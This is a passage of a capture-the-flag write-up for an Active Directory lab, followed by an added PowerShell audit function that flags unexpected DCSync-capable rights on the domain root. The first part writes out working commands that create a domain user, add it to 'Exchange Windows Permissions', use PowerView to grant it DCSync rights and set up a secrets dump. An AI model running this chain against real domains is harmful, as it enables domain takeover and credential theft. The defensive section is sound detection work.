net user ctflover password123 /add /domain
net group "Exchange Windows Permissions"
The group has no members, so we can add ourselves:
net group "Exchange Windows Permissions" /add ctflover
We need PowerView to do this. I tried the master branch but got some errors, so I'll try the dev branch of PowerView.
git clone https://github.com/PowerShellMafia/PowerSploit.git -b dev
Upload PowerView.ps1 to the target machine.
Import-Module .\PowerView.ps1
$SecPassword = ConvertTo-SecureString 'password123' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('HTB\ctflover', $SecPassword)
Add-ObjectAcl -Credential $Cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity ctflover -Rights DCSync
It worked properly; now I can use secretsdump to dump secrets.
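From the defender's side, the ACL change made above can be found by auditing the domain root for replication rights held by unexpected principals. This is an added example, not part of the original write-up; the function name, the allow-list and the sample ACEs are constructed for illustration and the allow-list must be adjusted to the environment.

```powershell
# Added example (not from the write-up): flag principals that hold
# DCSync-capable rights on the domain root object.

# Extended-right GUIDs used for directory replication.
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}
$AllZeroGuid = '00000000-0000-0000-0000-000000000000'   # ACE applies to every extended right

function Find-UnexpectedReplicationAce {   # hypothetical helper name
    param(
        [Parameter(Mandatory)] [object[]] $Ace,             # ACEs from the domain root ACL
        [Parameter(Mandatory)] [string[]] $AllowedIdentity  # principals expected to replicate
    )
    foreach ($a in $Ace) {
        if ("$($a.AccessControlType)" -ne 'Allow') { continue }
        $rights = "$($a.ActiveDirectoryRights)"
        $guid   = "$($a.ObjectType)".ToLower()
        $why    = $null
        if ($rights -match 'GenericAll') {
            $why = 'GenericAll'
        } elseif ($rights -match 'ExtendedRight' -and $guid -eq $AllZeroGuid) {
            $why = 'All extended rights'
        } elseif ($rights -match 'ExtendedRight' -and $ReplicationRights.ContainsKey($guid)) {
            $why = $ReplicationRights[$guid]
        }
        if ($why -and ($AllowedIdentity -notcontains "$($a.IdentityReference)")) {
            [pscustomobject]@{ Identity = "$($a.IdentityReference)"; Right = $why }
        }
    }
}

# Assumed allow-list for this lab domain; review before relying on it.
$Allowed = 'NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS', 'BUILTIN\Administrators',
           'HTB\Domain Controllers', 'NT AUTHORITY\SYSTEM', 'HTB\Enterprise Admins'

# Constructed sample ACEs shaped like the entries of (Get-Acl ...).Access.
$SampleAce = @(
    [pscustomobject]@{ IdentityReference = 'BUILTIN\Administrators'; ActiveDirectoryRights = 'ExtendedRight'; ObjectType = '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'; AccessControlType = 'Allow' }
    [pscustomobject]@{ IdentityReference = 'HTB\ctflover'; ActiveDirectoryRights = 'ExtendedRight'; ObjectType = '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'; AccessControlType = 'Allow' }
    [pscustomobject]@{ IdentityReference = 'HTB\ctflover'; ActiveDirectoryRights = 'ExtendedRight'; ObjectType = '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'; AccessControlType = 'Allow' }
)
# Live data instead of the sample (assumes the ActiveDirectory module's AD: drive):
#   $SampleAce = (Get-Acl 'AD:\DC=htb,DC=local').Access

Find-UnexpectedReplicationAce -Ace $SampleAce -AllowedIdentity $Allowed | Sort-Object Identity, Right
```

Any identity this reports on a production domain root should be traced back to the change that granted it, along with recent membership changes to groups that can modify the domain ACL.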